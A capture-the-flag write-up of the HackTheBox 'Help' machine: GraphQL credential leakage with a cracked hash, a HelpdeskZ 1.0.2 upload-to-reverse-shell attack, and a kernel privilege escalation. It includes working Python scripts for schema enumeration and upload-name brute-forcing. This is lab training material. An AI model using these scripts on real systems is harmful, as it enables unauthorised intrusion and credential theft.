Nmap
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.6 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 e5:bb:4d:9c:de:af:6b:bf:ba:8c:22:7a:d8:d7:43:28 (RSA)
| 256 d5:b0:10:50:74:86:a3:9f:c5:53:6f:3b:4a:24:61:19 (ECDSA)
|_ 256 e2:1b:88:d3:76:21:d4:1e:38:15:4a:81:11:b7:99:07 (ED25519)
80/tcp open http Apache httpd 2.4.18
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
3000/tcp open http Node.js Express framework
|_http-title: Site doesn’t have a title (application/json; charset=utf-8).
Service Info: Host: 127.0.1.1; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Ports 22 (SSH), 80 (Apache) and 3000 (Node.js/Express) are open.
Web pages
Port 3000 is uncommon, so I checked that page first.
The page returns a JSON error body, which is what a GraphQL endpoint running on Express answers when it is requested without a query; the endpoint itself is at /graphql.
I referred to the GraphQL documentation to learn how to write queries against it.
I managed to find the user credentials by querying the user type. The query below returns the username; the password field is fetched the same way.
http://help.htb:3000/graphql?query={user{username}}
The discovered username is helpme@helpme.com and the password field holds 5d3c93182bb20f07b994a7f617e99cff.
That value is an MD5 hash (32 hex characters); it cracks to godhelpmeplz.
Keep the credentials for later use.
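Guessing field names one at a time is slow; a GraphQL endpoint with introspection enabled will list its types and fields for you. The following Python is an added example, not code from the original writeup or from the box, that sends the introspection query in the same GET form used above, then generates a query selecting every scalar field of each object returned by the root query (which is how you land on {user{username,password}} without guessing). The sample response embedded below is constructed to mirror the User type found on this box, and the helper names are my own.

```python
import json
from urllib.parse import urlencode
from urllib.request import urlopen

# Introspection query: every type, its fields, and each field's return type
# (ofType is unwrapped a few levels to see through NON_NULL / LIST wrappers).
INTROSPECTION = (
    "{__schema{queryType{name}types{name,fields{name,"
    "type{name,ofType{name,ofType{name,ofType{name}}}}}}}}"
)


def graphql_get_url(base, query):
    """Build the GET form of a GraphQL request, as used on port 3000."""
    return base.rstrip("/") + "/graphql?" + urlencode({"query": query})


def _named_type(t):
    """Follow ofType until a named type is reached (None if nesting is too deep)."""
    while t is not None and t.get("name") is None:
        t = t.get("ofType")
    return t["name"] if t else None


def parse_schema(body):
    """Return (query_root_name, {type_name: [(field, return_type), ...]}),
    skipping the built-in __* introspection types."""
    schema = json.loads(body)["data"]["__schema"]
    root = schema["queryType"]["name"]
    types = {}
    for t in schema["types"]:
        if t["name"].startswith("__") or not t.get("fields"):
            continue
        types[t["name"]] = [(f["name"], _named_type(f["type"])) for f in t["fields"]]
    return root, types


def leaf_queries(root, types):
    """For each root field that returns an object type, build a query selecting
    all of that object's scalar fields, e.g. {user{username,password}}."""
    out = []
    for field, rtype in types.get(root, []):
        if rtype not in types:
            continue  # scalar at the root; nothing to expand
        scalars = [f for f, ft in types[rtype] if ft not in types]
        if scalars:
            out.append("{" + field + "{" + ",".join(scalars) + "}}")
    return out


def enumerate_queries(base):
    """Live version: introspect the endpoint and return the generated queries."""
    with urlopen(graphql_get_url(base, INTROSPECTION), timeout=10) as r:
        root, types = parse_schema(r.read())
    return leaf_queries(root, types)


# Constructed sample response (not captured from the box) that mirrors the
# schema the writeup found: a User type exposing username and password.
SAMPLE_RESPONSE = json.dumps({"data": {"__schema": {
    "queryType": {"name": "Query"},
    "types": [
        {"name": "Query", "fields": [
            {"name": "user",
             "type": {"name": None, "ofType": {"name": "User", "ofType": None}}}]},
        {"name": "User", "fields": [
            {"name": "username", "type": {"name": "String", "ofType": None}},
            {"name": "password", "type": {"name": "String", "ofType": None}}]},
        {"name": "String", "fields": None},
        {"name": "__Schema", "fields": [
            {"name": "types",
             "type": {"name": None, "ofType": {"name": "__Type", "ofType": None}}}]},
    ]}}})

if __name__ == "__main__":
    root, types = parse_schema(SAMPLE_RESPONSE)
    for q in leaf_queries(root, types):
        print(graphql_get_url("http://help.htb:3000", q))
```

If introspection is disabled the `__schema` query returns an error instead; in that case fall back to guessing common field names, but try introspection first because it also reveals fields (like password here) that nothing in the UI hints at.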
Next, I checked port 80, but it only showed the default Apache page.
I checked whether there were any directories I could access.
Found a valid one: /support (the same path the upload directory below sits under).
user flag
I opened the directory and signed in with the credentials found earlier.
It's running HelpdeskZ. When this challenge was active, the HelpdeskZ version was 1.0.2.
I found the exploit via Google: https://gist.github.com/SakiiR/b005c6d1c955502cfe1d1dfc959cc0f7
HelpdeskZ 1.0.2 lets a logged-in user attach a file to a ticket. The attachment is written to support/uploads/tickets/ under a name built from md5(original filename + Unix timestamp of the upload) plus the original extension, and it is written even though the UI reports the file type as not allowed. So a PHP reverse shell can be uploaded and reached, provided the upload second can be guessed:
echo md5("r.php1722700108");
f79101507c81f666857fd9eaf601af5e
Here r.php is the uploaded filename and 1722700108 is the upload time as a Unix timestamp. So, with a listener waiting, I can trigger the reverse shell by requesting help.htb/support/uploads/tickets/f79101507c81f666857fd9eaf601af5e.php
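The only uncertainty in the path above is the exact second the server stamped the upload with, so in practice you walk a window of timestamps around the upload time. The following Python is an added example, not code from the original writeup or from the linked gist: it reproduces the HelpdeskZ 1.0.2 naming scheme shown above (md5 of the original filename concatenated with the Unix timestamp, plus the original extension), generates candidate names nearest-first around a recorded upload time, and requests each one until one exists. The filename r.php, the timestamp, the window size and the helper names are assumptions for illustration; the upload path is the one from this box.

```python
import hashlib
import socket
import time
from urllib.error import HTTPError, URLError
from urllib.request import Request, urlopen

UPLOAD_DIR = "http://help.htb/support/uploads/tickets/"


def stored_name(original, ts):
    """HelpdeskZ 1.0.2 naming: md5(original filename + unix time) + '.' + ext."""
    ext = original.rsplit(".", 1)[-1]
    return hashlib.md5((original + str(ts)).encode()).hexdigest() + "." + ext


def candidate_names(original, center_ts, window):
    """Names for every second in [center-window, center+window], nearest first."""
    offsets = sorted(range(-window, window + 1), key=abs)
    return [stored_name(original, center_ts + d) for d in offsets]


def find_uploaded(base_url, original, center_ts, window, exists):
    """Return the first candidate name for which exists(url) is true, else None.
    `exists` is injected so the search can be driven by any probe function."""
    for name in candidate_names(original, center_ts, window):
        if exists(base_url + name):
            return name
    return None


def http_exists(url, timeout=5):
    """True if the URL answers 200, or if the request hangs: a PHP reverse shell
    never returns a response, so a timeout on an existing file is a hit."""
    try:
        with urlopen(Request(url), timeout=timeout) as r:
            return r.status == 200
    except HTTPError:
        return False  # 404 and friends: not this name
    except (socket.timeout, TimeoutError):
        return True
    except URLError as e:
        return isinstance(e.reason, (socket.timeout, TimeoutError))


if __name__ == "__main__":
    # Record the time immediately before submitting the ticket with the
    # attachment (the upload itself happens in the browser or via the gist),
    # then search around it. A window of +/-60 s covers clock skew between
    # your host and the server; widen it if the server's Date header disagrees.
    upload_ts = int(time.time())  # placeholder: record this at upload time
    hit = find_uploaded(UPLOAD_DIR, "r.php", upload_ts, 60, http_exists)
    print("found:", hit if hit else "nothing in window")
```

Because the first successful request executes the shell, start the listener before running the search; the request that finds the file is the one that connects back, and the script only reports the name after that connection has already happened.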
root flag
$ uname -a
Linux help 4.4.0-116-generic #140-Ubuntu SMP Mon Feb 12 21:23:04 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux
This kernel build has a known local privilege escalation: https://www.exploit-db.com/exploits/44298
Let's copy the exploit and execute it.
file 44298
44298: C source, ASCII text, with CRLF line terminators
I moved it to the target server and compiled it there. The CRLF line endings do not bother gcc, but if the build complains, run dos2unix on the file first.
Lessons learned
- uname -a (check the kernel version, then look for a matching kernel exploit)
- GraphQL (query the endpoint directly; it can expose fields such as password hashes)
- searchsploit (it can be used during the OSCP exam)